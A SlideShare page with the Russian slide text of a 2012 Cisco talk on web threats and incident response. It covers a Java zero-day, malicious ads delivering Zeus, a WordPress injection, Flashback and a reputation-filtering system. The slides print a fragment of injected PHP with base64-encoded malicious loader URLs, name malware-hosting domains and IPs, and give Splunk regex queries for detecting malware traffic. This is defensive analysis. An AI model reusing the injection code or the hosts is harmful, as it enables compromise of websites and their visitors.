Анализ защищенности интернет-проектовАнализ защищенности интернет-проектов
Анализ защищенности интернет-проектовDmitry Evteev
 
Essential security aspects in heterogenous Data Centers
Essential security aspects in heterogenous Data CentersEssential security aspects in heterogenous Data Centers
Essential security aspects in heterogenous Data CentersNikolay Romanov
 
Мобильные угрозы и консьюмеризация в корпоративной среде
Мобильные угрозы и консьюмеризация в корпоративной средеМобильные угрозы и консьюмеризация в корпоративной среде
Мобильные угрозы и консьюмеризация в корпоративной средеDenis Bezkorovayny
 
Как создать в России свою систему Threat intelligence?
Как создать в России свою систему Threat intelligence?Как создать в России свою систему Threat intelligence?
Как создать в России свою систему Threat intelligence?Aleksey Lukatskiy
 

Similar to Актуально про веб-безопасность – угрозы и реагирование. (20)

Social network security
Social network securitySocial network security
Social network security
 
Cisco Secure X
Cisco Secure XCisco Secure X
Cisco Secure X
 
Сеть как средство защиты и реагирования на угрозы
Сеть как средство защиты и реагирования на угрозыСеть как средство защиты и реагирования на угрозы
Сеть как средство защиты и реагирования на угрозы
 
Новые тенденции и новые технологии на рынке ИБ
Новые тенденции и новые технологии на рынке ИБНовые тенденции и новые технологии на рынке ИБ
Новые тенденции и новые технологии на рынке ИБ
 
Устранение веб-угроз с помощью комплексных средств безопасности
Устранение веб-угроз с помощью комплексных средств безопасностиУстранение веб-угроз с помощью комплексных средств безопасности
Устранение веб-угроз с помощью комплексных средств безопасности
 
Cisco AMP: платформа для борьбы с вредоносным кодом
Cisco AMP: платформа для борьбы с вредоносным кодомCisco AMP: платформа для борьбы с вредоносным кодом
Cisco AMP: платформа для борьбы с вредоносным кодом
 
Cisco ASA with FirePOWER Services
Cisco ASA with FirePOWER ServicesCisco ASA with FirePOWER Services
Cisco ASA with FirePOWER Services
 
New security threats
New security threatsNew security threats
New security threats
 
Угрозы меняются! Как все время быть начеку?
Угрозы меняются! Как все время быть начеку?Угрозы меняются! Как все время быть начеку?
Угрозы меняются! Как все время быть начеку?
 
Как превратить свою сеть в систему информационной безопасности
Как превратить свою сеть в систему информационной безопасности Как превратить свою сеть в систему информационной безопасности
Как превратить свою сеть в систему информационной безопасности
 
Один зеродей и тысяча ночей без сна
Один зеродей и тысяча ночей без снаОдин зеродей и тысяча ночей без сна
Один зеродей и тысяча ночей без сна
 
Подробный обзор Cisco ASA with FirePOWER Services
Подробный обзор Cisco ASA with FirePOWER ServicesПодробный обзор Cisco ASA with FirePOWER Services
Подробный обзор Cisco ASA with FirePOWER Services
 
Cisco Advanced Malware Protection для руководителей, принимающих решения
Cisco Advanced Malware Protection для руководителей, принимающих решенияCisco Advanced Malware Protection для руководителей, принимающих решения
Cisco Advanced Malware Protection для руководителей, принимающих решения
 
Годовой отчет Cisco по безопасности за 2014 год
Годовой отчет Cisco по безопасности за 2014 годГодовой отчет Cisco по безопасности за 2014 год
Годовой отчет Cisco по безопасности за 2014 год
 
Годовой отчет Cisco по безопасности за 2014 год
Годовой отчет Cisco по безопасности за 2014 годГодовой отчет Cisco по безопасности за 2014 год
Годовой отчет Cisco по безопасности за 2014 год
 
Cisco Cyber Threat Defense
Cisco Cyber Threat DefenseCisco Cyber Threat Defense
Cisco Cyber Threat Defense
 
Анализ защищенности интернет-проектов
Анализ защищенности интернет-проектовАнализ защищенности интернет-проектов
Анализ защищенности интернет-проектов
 
Essential security aspects in heterogenous Data Centers
Essential security aspects in heterogenous Data CentersEssential security aspects in heterogenous Data Centers
Essential security aspects in heterogenous Data Centers
 
Мобильные угрозы и консьюмеризация в корпоративной среде
Мобильные угрозы и консьюмеризация в корпоративной средеМобильные угрозы и консьюмеризация в корпоративной среде
Мобильные угрозы и консьюмеризация в корпоративной среде
 
Как создать в России свою систему Threat intelligence?
Как создать в России свою систему Threat intelligence?Как создать в России свою систему Threat intelligence?
Как создать в России свою систему Threat intelligence?
 

More from Cisco Russia

Service portfolio 18
Service portfolio 18Service portfolio 18
Service portfolio 18Cisco Russia
 
История одного взлома. Как решения Cisco могли бы предотвратить его?
История одного взлома. Как решения Cisco могли бы предотвратить его?История одного взлома. Как решения Cisco могли бы предотвратить его?
История одного взлома. Как решения Cisco могли бы предотвратить его?Cisco Russia
 
Об оценке соответствия средств защиты информации
Об оценке соответствия средств защиты информацииОб оценке соответствия средств защиты информации
Об оценке соответствия средств защиты информацииCisco Russia
 
Обзор Сервисных Услуг Cisco в России и странах СНГ.
Обзор Сервисных Услуг Cisco в России и странах СНГ.Обзор Сервисных Услуг Cisco в России и странах СНГ.
Обзор Сервисных Услуг Cisco в России и странах СНГ.Cisco Russia
 
Клиентские контракты на техническую поддержку Cisco Smart Net Total Care
Клиентские контракты на техническую поддержку Cisco Smart Net Total CareКлиентские контракты на техническую поддержку Cisco Smart Net Total Care
Клиентские контракты на техническую поддержку Cisco Smart Net Total CareCisco Russia
 
Cisco Catalyst 9000 series
Cisco Catalyst 9000 series Cisco Catalyst 9000 series
Cisco Catalyst 9000 series Cisco Russia
 
Cisco Endpoint Security for MSSPs
Cisco Endpoint Security for MSSPsCisco Endpoint Security for MSSPs
Cisco Endpoint Security for MSSPsCisco Russia
 
Профессиональные услуги Cisco для Software-Defined Access
Профессиональные услуги Cisco для Software-Defined AccessПрофессиональные услуги Cisco для Software-Defined Access
Профессиональные услуги Cisco для Software-Defined AccessCisco Russia
 
Обнаружение известного вредоносного кода в зашифрованном с помощью TLS трафик...
Обнаружение известного вредоносного кода в зашифрованном с помощью TLS трафик...Обнаружение известного вредоносного кода в зашифрованном с помощью TLS трафик...
Обнаружение известного вредоносного кода в зашифрованном с помощью TLS трафик...Cisco Russia
 
Промышленный Интернет вещей: опыт и результаты применения в нефтегазовой отрасли
Промышленный Интернет вещей: опыт и результаты применения в нефтегазовой отраслиПромышленный Интернет вещей: опыт и результаты применения в нефтегазовой отрасли
Промышленный Интернет вещей: опыт и результаты применения в нефтегазовой отраслиCisco Russia
 
Полугодовой отчет Cisco по информационной безопасности за 2017 год
Полугодовой отчет Cisco по информационной безопасности за 2017 год Полугодовой отчет Cisco по информационной безопасности за 2017 год
Полугодовой отчет Cisco по информационной безопасности за 2017 год Cisco Russia
 
Годовой отчет Cisco по кибербезопасности за 2017 год
Годовой отчет Cisco по кибербезопасности за 2017 годГодовой отчет Cisco по кибербезопасности за 2017 год
Годовой отчет Cisco по кибербезопасности за 2017 годCisco Russia
 
Безопасность для цифровой экономики. Развитие продуктов и решений Cisco
Безопасность для цифровой экономики. Развитие продуктов и решений CiscoБезопасность для цифровой экономики. Развитие продуктов и решений Cisco
Безопасность для цифровой экономики. Развитие продуктов и решений CiscoCisco Russia
 
Cisco StealthWatch. Использование телеметрии для решения проблемы зашифрованн...
Cisco StealthWatch. Использование телеметрии для решения проблемы зашифрованн...Cisco StealthWatch. Использование телеметрии для решения проблемы зашифрованн...
Cisco StealthWatch. Использование телеметрии для решения проблемы зашифрованн...Cisco Russia
 
Обеспечение бесперебойной работы корпоративных приложений в больших гетероген...
Обеспечение бесперебойной работы корпоративных приложений в больших гетероген...Обеспечение бесперебойной работы корпоративных приложений в больших гетероген...
Обеспечение бесперебойной работы корпоративных приложений в больших гетероген...Cisco Russia
 
Новое поколение серверов Сisco UCS. Гиперконвергентное решении Cisco HyperFle...
Новое поколение серверов Сisco UCS. Гиперконвергентное решении Cisco HyperFle...Новое поколение серверов Сisco UCS. Гиперконвергентное решении Cisco HyperFle...
Новое поколение серверов Сisco UCS. Гиперконвергентное решении Cisco HyperFle...Cisco Russia
 

More from Cisco Russia (20)

Service portfolio 18
Service portfolio 18Service portfolio 18
Service portfolio 18
 
История одного взлома. Как решения Cisco могли бы предотвратить его?
История одного взлома. Как решения Cisco могли бы предотвратить его?История одного взлома. Как решения Cisco могли бы предотвратить его?
История одного взлома. Как решения Cisco могли бы предотвратить его?
 
Об оценке соответствия средств защиты информации
Об оценке соответствия средств защиты информацииОб оценке соответствия средств защиты информации
Об оценке соответствия средств защиты информации
 
Обзор Сервисных Услуг Cisco в России и странах СНГ.
Обзор Сервисных Услуг Cisco в России и странах СНГ.Обзор Сервисных Услуг Cisco в России и странах СНГ.
Обзор Сервисных Услуг Cisco в России и странах СНГ.
 
Клиентские контракты на техническую поддержку Cisco Smart Net Total Care
Клиентские контракты на техническую поддержку Cisco Smart Net Total CareКлиентские контракты на техническую поддержку Cisco Smart Net Total Care
Клиентские контракты на техническую поддержку Cisco Smart Net Total Care
 
Cisco Catalyst 9000 series
Cisco Catalyst 9000 series Cisco Catalyst 9000 series
Cisco Catalyst 9000 series
 
Cisco Catalyst 9500
Cisco Catalyst 9500Cisco Catalyst 9500
Cisco Catalyst 9500
 
Cisco Catalyst 9400
Cisco Catalyst 9400Cisco Catalyst 9400
Cisco Catalyst 9400
 
Cisco Umbrella
Cisco UmbrellaCisco Umbrella
Cisco Umbrella
 
Cisco Endpoint Security for MSSPs
Cisco Endpoint Security for MSSPsCisco Endpoint Security for MSSPs
Cisco Endpoint Security for MSSPs
 
Cisco FirePower
Cisco FirePowerCisco FirePower
Cisco FirePower
 
Профессиональные услуги Cisco для Software-Defined Access
Профессиональные услуги Cisco для Software-Defined AccessПрофессиональные услуги Cisco для Software-Defined Access
Профессиональные услуги Cisco для Software-Defined Access
 
Обнаружение известного вредоносного кода в зашифрованном с помощью TLS трафик...
Обнаружение известного вредоносного кода в зашифрованном с помощью TLS трафик...Обнаружение известного вредоносного кода в зашифрованном с помощью TLS трафик...
Обнаружение известного вредоносного кода в зашифрованном с помощью TLS трафик...
 
Промышленный Интернет вещей: опыт и результаты применения в нефтегазовой отрасли
Промышленный Интернет вещей: опыт и результаты применения в нефтегазовой отраслиПромышленный Интернет вещей: опыт и результаты применения в нефтегазовой отрасли
Промышленный Интернет вещей: опыт и результаты применения в нефтегазовой отрасли
 
Полугодовой отчет Cisco по информационной безопасности за 2017 год
Полугодовой отчет Cisco по информационной безопасности за 2017 год Полугодовой отчет Cisco по информационной безопасности за 2017 год
Полугодовой отчет Cisco по информационной безопасности за 2017 год
 
Годовой отчет Cisco по кибербезопасности за 2017 год
Годовой отчет Cisco по кибербезопасности за 2017 годГодовой отчет Cisco по кибербезопасности за 2017 год
Годовой отчет Cisco по кибербезопасности за 2017 год
 
Безопасность для цифровой экономики. Развитие продуктов и решений Cisco
Безопасность для цифровой экономики. Развитие продуктов и решений CiscoБезопасность для цифровой экономики. Развитие продуктов и решений Cisco
Безопасность для цифровой экономики. Развитие продуктов и решений Cisco
 
Cisco StealthWatch. Использование телеметрии для решения проблемы зашифрованн...
Cisco StealthWatch. Использование телеметрии для решения проблемы зашифрованн...Cisco StealthWatch. Использование телеметрии для решения проблемы зашифрованн...
Cisco StealthWatch. Использование телеметрии для решения проблемы зашифрованн...
 
Обеспечение бесперебойной работы корпоративных приложений в больших гетероген...
Обеспечение бесперебойной работы корпоративных приложений в больших гетероген...Обеспечение бесперебойной работы корпоративных приложений в больших гетероген...
Обеспечение бесперебойной работы корпоративных приложений в больших гетероген...
 
Новое поколение серверов Сisco UCS. Гиперконвергентное решении Cisco HyperFle...
Новое поколение серверов Сisco UCS. Гиперконвергентное решении Cisco HyperFle...Новое поколение серверов Сisco UCS. Гиперконвергентное решении Cisco HyperFle...
Новое поколение серверов Сisco UCS. Гиперконвергентное решении Cisco HyperFle...
 

Актуально про веб-безопасность – угрозы и реагирование.

  • 1. Cisco Expo 2012 Состояние Web безопасности: атака и реагирование Павел Родионов Systems Engineer, Security © 2011 Cisco and/or its affiliates. All rights reserved. 1 1
  • 2. •  Ландшафт и тенденции Web угроз •  Реальные инциденты •  Мониторинг безопасности и реагирование на инциденты © 2011 Cisco and/or its affiliates. All rights reserved. 2 2
  • 3. Web браузеры – это не единственная цель, вся экосистема под угрозой © 2011 Cisco and/or its affiliates. All rights reserved. 3
  • 4. 2009 “70 процентов из 100 [интернет] узлов или содержат вредоносный контент или содержат замаскированный переход для того, чтобы перенаправить ничего не подозревающую жертву с легитимных узлов на вредоносные сайты… Волны целевых email атак… эксплуатируют уязвимости на стороне клиента таких широко используемых программ как Adobe PDF Reader, Java, QuickTime, Adobe Flash и Microsoft Office. Те же уязвимости эксплуатируются атакущими, которые инфицируют посетителей небезопасных вебсайтов…” Source: Websense “State of Internet Security, Q3-Q4”, 2008. © 2011 Cisco and/or its affiliates. All rights reserved. 4 4
  • 5. 2010 •  Websense Security Labs идентифицировала увеличение количества вредоносных сайтов на 111.4% в период с 2009 до 2010 •  79.9% веб узлов с вредоносным кодом были скомпрометированными легитимными вебсайтами. •  Поиск ярких событий и текущих новостей приводит к большему риску (22.4%) чем поиск по «спорному» содержимому (21.8%). •  В 2010 США были на первом месте по распространению и хостингу malware . Source: Websense 2010 Threat Report © 2011 Cisco and/or its affiliates. All rights reserved. 5 5
  • 6. 2011 •  “…количество уязвимостей, которые атакуют конечные узлы утроилось, при этом большая часть из них (78%) найдена в не-Microsoft программах. Их сложнее пропатчить из-за необходимости работы нескольких механизмов.” •  “72% уязвимостей закрываются патчем, доступным в день раскрытия данных об уязвимости.” •  “50% пользователей используют более 66 программ от более чем 22 разных вендоров.” Source: Secunia Yearly Report 2011. © 2011 Cisco and/or its affiliates. All rights reserved. 6 6
  • 7. 2012 •  Количество вредоносных доменов увеличилось на 27% с 2011 по 2012 и на 47% с 2010 по 2011. •  В среднем в 2011 году в месяц обнаруживалось 20,141 уникальных хостов c Web malware, в то время как то же значение в 2010 было 14,217. •  Во время 4Q11, 33% встреченного Web malware было zero-day malwarе, которое не могло быть обнаружено с помощью традиционных методик обнаружения сигнатурными сканерами. Source: Cisco Global Threat Report Q42011. © 2011 Cisco and/or its affiliates. All rights reserved. 7 7
  • 8. https://browsercheck.qualys.com © 2011 Cisco and/or its affiliates. All rights reserved. 8 8
  • 9. Source: “The Inconvenient Truth About the State of Browser Security”, 2011. Wolfgang Kandek, CTO Qualys, Inc. © 2011 Cisco and/or its affiliates. All rights reserved. 9 9
  • 10. © 2011 Cisco and/or its affiliates. All rights reserved. 10 10
  • 11. “В долгорочной перспективе более 60% Java инстялляций никогда не поддерживаются в «свежем» состоянии. Поскольку такое количество компьютеров не обновлено, даже старые эксплиты могут использоваться для компрометации жертв. …Мы обнаружили, что во время первого месяца после выпуска патче, уровень адаптации не превышает 10%. Через 2 месяца, примерно 20% устанавливают патчи и через 3 месяца 30%. Мы определили, что самый высокий уровень установки патчей был 38% с Java Version 6 Update 26 через три месяца после релиза.” - Marcus Carey, Rapid7 Source: Krebs on Security “New Java Attack Rolled into Exploit Packs”. March, 2012. © 2011 Cisco and/or its affiliates. All rights reserved. 11 11
  • 12. •  Обнаружена – 27 августа 2012 года •  Анализ -- http://www.deependresearch.org/2012/08/java-7-0-day- vulnerability-information.html •  Впервые сообщено об аналогичной уязвимости – 10 августа 2012 года Марком Вуглером •  Oracle выпустил update 7 (7u7), который исправляет эту уязвимость © 2011 Cisco and/or its affiliates. All rights reserved. 12 12
  • 13. Как это работает •  Зашифрованный javascript в index.html •  Уязвимость атакует Java 7 (1.7) Update 0 до 6. Не атакует Java 6 и ниже •  Работает на всех браузерах, в том числе и Google Chrome •  Не оказывает видимого влияния на работу браузеров •  При загрузке вредоносного кода, если система не уязвима, атака останавливается. С точки зрения пользователя невозможно сказать, была ли атака успешной, или же нет. •  Если атака успешна, она загружает и выполняет вредоносный двоичный код, который вызывается с другого DNS/IP hello.icon.pk / 223.25.233.244 © 2011 Cisco and/or its affiliates. All rights reserved. 13 13
  • 14. Как отреагировала Cisco? © 2011 Cisco and/or its affiliates. All rights reserved. 14 14
  • 15. © 2011 Cisco and/or its affiliates. All rights reserved. 15 15
  • 16. © 2011 Cisco and/or its affiliates. All rights reserved. 16 16
  • 17. © 2011 Cisco and/or its affiliates. All rights reserved. 17 17
  • 18. © 2011 Cisco and/or its affiliates. All rights reserved. 18 18
  • 19. © 2011 Cisco and/or its affiliates. All rights reserved. 19
  • 20. DLL инъекция из Web •  “После захвата всех необходимых привилегий на компьютере жертвы, эксполит не устанавливает вредоносный код на жесткий диск с использованием Java. •  Вместо этого он инъектирует зашифрованный DLL прямо в память процесса jawaw.exe. “ Source: Sergey Golovanov “A unique ‘fileless’ bot attacks news site visitors’. March, 2012. © 2011 Cisco and/or its affiliates. All rights reserved. 20 20
  • 21. DLL инъекция из Web “В процессе исследования мы определии, что киберпреступники использовали учетную запись клиента AdFox для изменения кода одного из баннеров и добавили туда перенаправление iframe на вредоносный сайт. После модификации кода они смогли атаковать пользователей не только новостного сайта, но также посетителей других ресурсов, которые размещали этот баннер. Как результат могли быть атакованы десятки тысяч пользователей. В то же самое время баннеры других клиентов AdFox вредоносного кода не содержали.” Source: Sergey Golovanov “A unique ‘fileless’ bot attacks news site visitors’. March, 2012. © 2011 Cisco and/or its affiliates. All rights reserved. 21 21
  • 22. JAR файл атакует загрузкойCVE-2011-3544 •  Пакетный анализатор создал JAR файл для анализа malware •  При помощью поиска в web лог-файлах мы нашли Java User-Agent, загружающий двоичные файлы, мы затем отследили направляющий URL •  Популярные новостные сайты в Бангалоре направляли своих читателей через встроенный Javascript на рекламу с вредоносным Jar файлом. •  Загрузка варианта Zeus bot © 2011 Cisco and/or its affiliates. All rights reserved. 22 22
  • 23. © 2011 Cisco and/or its affiliates. All rights reserved. 23 23
  • 24. •  Сотни имен для хоста, который размещает файл •  Загружен бот Zeus •  Загрузена конфигурация бота •  Собрана информация © 2011 Cisco and/or its affiliates. All rights reserved. 24 24
  • 25. Запрос URL: http://users9.nofeehost.com/patrickkeed/all.bin © 2011 Cisco and/or its affiliates. All rights reserved. 25 25
  • 26. Инъекция в Wordpress и его последствия 2 © 2011 Cisco and/or its affiliates. All rights reserved. 26
  • 27. © 2011 Cisco and/or its affiliates. All rights reserved. 27 27
  • 28. Внутренние клиенты запросили 650+ уникальных URL за две недели. Запрошен широкий диапазон доменов и URL: © 2011 Cisco and/or its affiliates. All rights reserved. 28 28
  • 29. http://www.vfwpost7383.org/ © 2011 Cisco and/or its affiliates. All rights reserved. 29 29
  • 30. © 2011 Cisco and/or its affiliates. All rights reserved. 30 30
  • 31. …$_SERVER['s_p1']=$mz; $_SERVER['s_b1']=$bot; $_SERVER['s_t1']=1200; $_SERVER['s_d1']=base64_decode('aHR0cDovL2VuczEy Mnp6emRkYXp6LmNvbS8='); $d='? d='.urlencode($_SERVER["HTTP_HOST"])."&p=".urlencod e($_SERVER["PHP_SELF"])."&a=".urlencode($_SERVER[ "HTTP_USER_AGENT"]); $_SERVER['s_a1']=base64_decode('aHR0cDovL2Nvb3Bl cmpzdXRmOC5ydS9nX2xvYWQucGhw').$d; $_SERVER['s_a2']=base64_decode('aHR0cDovL25saW5 0aGV3b29kLmNvbS9nX2xvYWQucGhw').$d; $_SERVER['s_script']="nl.php?p=d";… © 2011 Cisco and/or its affiliates. All rights reserved. 31 31
  • 32. aHR0cDovL2VuczEyMnp6emRkYXp6LmNvbS8= http://ens122zzzddazz.com aHR0cDovL2Nvb3BlcmpzdXRmOC5ydS9nX2xvYWQucGhw’ http://cooperjsutf8.ru/g_load.php aHR0cDovL25saW50aGV3b29kLmNvbS9nX2xvYWQucGhw http://nlinthewood.com/g_load.php © 2011 Cisco and/or its affiliates. All rights reserved. 32 32
  • 33. 1332868923.052 129 10.1.2.3 TCP_DENIED/403 419 GET http:// smains29treamsp.rr.nu/nl.php?p=d BLOCK_WBRS -8.8 "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:10.0.2) Gecko/20100101 Firefox/10.0.2" Referrer="http:// www.vfwpost7383.org/" 1332512746.272 195 10.1.2.14 TCP_DENIED/403 419 GET http:// pfo42rest.rr.nu/nl.php?p=d BLOCK_WBRS -8.6 "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; PredictYourBabySearchToolbar 1.2)" Referrer="http://www.vfwpost7383.org/" 1332868632.124 219 10.1.2.98 TCP_DENIED/403 419 GET http:// ste07rda.rr.nu/nl.php?p=d BLOCK_WBRS -8.8 "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/ 17.0.963.83 Safari/535.11" Referrer="http://www.vfwpost7383.org/" © 2011 Cisco and/or its affiliates. All rights reserved. 33 33
  • 34. © 2011 Cisco and/or its affiliates. All rights reserved. 34 34
  • 35. Троян Macintosh OSX Flashback 3 © 2011 Cisco and/or its affiliates. All rights reserved. 35
  • 36. © 2011 Cisco and/or its affiliates. All rights reserved. 36 36
  • 37. © 2011 Cisco and/or its affiliates. All rights reserved. 37 37
  • 38. Flashback user-agent query (2nd and 3rd variants): (auupdate OR scheck OR owncheck) AND (cs_url="*/scheck/*" OR cs_url="*/auupdate/*" OR cs_url="*/owncheck/*") | regex cs_useragent="(^[MN][Djz][BFJNRVZdhl][8][a][T][M][4][N][n])|(^[MNOQR][0DETUjkz][ABEFIJMNQRUVYZcdghkl] [012345BCDEFGwxyz][MNOQR][0DETUjkz][ABEFIJMNQRUVYZcdghkl][012345BCDEFGwxyz][MNOQR][0DETUjkz] [AEIMQUYcgk][t][MNOQR][0DETUjkz][ABEFIJMNQRUVYZcdghkl][012345BCDEFGwxyz][MNOQR][CSiy][01] [012345BCDEFGwxyz][MNOQR][0DETUjkz][ABEFIJMNQRUVYZcdghkl][012345BCDEFGwxyz][L][TU] [ABEFIJMNQRUVYZcdghkl][012345BCDEFGwxyz][MNOQR][0DETUjkz][AEIMQUYcgk][t][MNOQR][0DETUjkz] [ABEFIJMNQRUVYZcdghkl][012345BCDEFGwxyz][MNOQR][0DETUjkz][ABEFIJMNQRUVYZcdghkl][012345BCDEFGwxyz] [MNOQR][0DETUjkz][ABEFIJMNQRUVYZcdghkl][012345BCDEFGwxyz][MNOQR][0DETUjkz][ABEFIJMNQRUVYZcdghkl] [012345BCDEFGwxyz])" © 2011 Cisco and/or its affiliates. All rights reserved. 38 38
  • 39. Flashback user-agent query (1st variant): NOT cs_referer="*” AND (cs_url="*/scheck/*" OR cs_url="*/owncheck/*") | regex cs_useragent="id:([A-Za-z0-9]){8}-([A-Za-z0-9]) {4}-([A-Za-z0-9]){4}-([A-Za-z0-9]){4}-([A-Za-z0-9]){12}" Gbot query: cs_method="GET" cs_url=*jpg?v* cs_url="*tq=*" TDSS query: (cs_url="*2xrP*") | regex cs_url="/.{17}2xrP" © 2011 Cisco and/or its affiliates. All rights reserved. 39 39
  • 40. Взлом сайтов госорганизаций 4 © 2011 Cisco and/or its affiliates. All rights reserved. 40
  • 41. Заблокирован репутационной системой Cisco © 2011 Cisco and/or its affiliates. All rights reserved. 41
  • 42. Заблокирован репутационной системой Cisco © 2011 Cisco and/or its affiliates. All rights reserved. 42
  • 43. Почему? •  Безобидный скрипт http:// www.fmsmoscow.ru/js/ lightbox.js •  Функция скрипта – оверлеинг изображений •  Скрипт модифицирован для перенаправления на вредоносные узлы и загрузки malware © 2011 Cisco and/or its affiliates. All rights reserved. 43 43
  • 44. Почему? © 2011 Cisco and/or its affiliates. All rights reserved. 44 44
  • 45. © 2011 Cisco and/or its affiliates. All rights reserved. 45
  • 46. §  Один день глобального трафика Cisco §  HTTP -- 25% всего трафика (SSL + 6%) §  12.5TB
  • 47. © 2011 Cisco and/or its affiliates. All rights reserved. 47 47
  • 48. Web Based Reputation System (WBRS) Bad - Block Neutral – AV Scan Good - Allow -10 10 -9 -8 -7 -6 -5 -4 -3 -2 -1 0 1 2 3 4 5 6 7 8 9 © 2011 Cisco and/or its affiliates. All rights reserved. 48 48
  • 49. © 2011 Cisco and/or its affiliates. All rights reserved. 49 49
  • 50. Выборы, выборы… •  Создан сайт www.vybory2012.gov.ua •  При создании сайта использовались адреса из блока © 2011 Cisco and/or its affiliates. All rights reserved. 50 50
  • 51. Выборы, выборы… •  Новый домен, IP в blocklist – репутация -6.3 •  Через неделю репутация -5.4. Домен не новый, но IP адрес все еще в блоклистах © 2011 Cisco and/or its affiliates. All rights reserved. 51 51
  • 52. © 2011 Cisco and/or its affiliates. All rights reserved. 52 52
  • 53. © 2011 Cisco and/or its affiliates. All rights reserved. 53 53
  • 54. © 2011 Cisco and/or its affiliates. All rights reserved. 54 54
  • 55. © 2011 Cisco and/or its affiliates. All rights reserved. 55 55
  • 56. GET / HTTP/1.1 What the client requests from the web 1 Host: ihaveabadreputation.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 403 Forbidden What the client gets back from the proxy Mime-Version: 1.0 Date: Thu, 12 Apr 2012 18:38:03 GMT Content-Type: text/html 2 Connection: keep-alive http://wwwintranet.cisco.com/blocked-page.shtml Content-Length: 267 3 GET /blocked-page.shtml HTTP/1.1 Host: wwwintranet.cisco.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0 Accept: text/html,application/xhtml+xml,application/ xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 200 OK © 2011 Cisco and/or its affiliates. All rights reserved. 56 56
  • 57. В качестве резюме: •  Браузер – уже не цель, под риском находится вся the экосистема. •  Пакеты эксплоитов заполнены эффективными плагинами и часто содержат атаки - дня. Антивирусы хорошо защищают от старых атак, но остается громадное окно для работы эксплоитов. •  Нужно базовое образование безопасности - любопытство приводит людей к эксплоитом - нет стремления к исправлению и фактор неопределенности •  Инвестируйте в исследования, автоматизация на сетевом уровне и уровне приложений (патчинг/AV) поможет защитить организацию - гибкость бизнеса с IT - не полагайтесь на рутинный человеческий фактор - включайте глубокое расследование © 2011 Cisco and/or its affiliates. All rights reserved. 57 57
  • 58. Золотые правила выживания в сетевых джунглях •  Регулярно обновляйте свои ОС и приложения, особенно Java, Adobe и офисные продукты •  Используйте современные браузеры и рассматривайте плагины, которые позволяеют отключить скрипты/Java/Flash и другие общие пути для атаки браузера •  Используйте разные пароли для разных областей жизни: один для почты, один для финансовых транзакций, один для социальных приложений и т.д. •  Следите за балансом на кредитной карте, регулярно его проверяйте; Включите смс-банкинг •  Используйте и регулярно обновляйте антивирус •  Используйте программный или аппаратный firewall •  Берегитесь коротких, странных твитов, обновлений Facebook и других социальных сетей, даже от друзей, которые содержат ссылку. •  Используйте шифрование и делайте резервные копии всего так часто, как вы можете это себе позволить. Source: Steve Santorelli. Cymru Quarterly. March 2012. © 2011 Cisco and/or its affiliates. All rights reserved. 58 58
  • 59. Золотые правила (для реагирования на инциденты) •  Разработайте точную и регулярно обновляемую систему записей для идентификации адреса, хост и команду по работе с приложением •  Внедрите систему сбора логов везде, где это возможно для максимизации собираемой информации и проведения расследований •  Внедрите систему индексации и поиска и построения отчетов для того, чтобы работать с «большими» данными •  Разработайте и поддерживаейте гибкую стратегию обновления, включая своевременные уведомления, правильную контактную информацию и планы по выполнению. •  Записывайте все и все возможное в сети до тех пор, пока вы это можете хранить и искать •  Разрешите разработку, исследования, открытие дискуссии и обмен информацией с экспертами © 2011 Cisco and/or its affiliates. All rights reserved. 59 59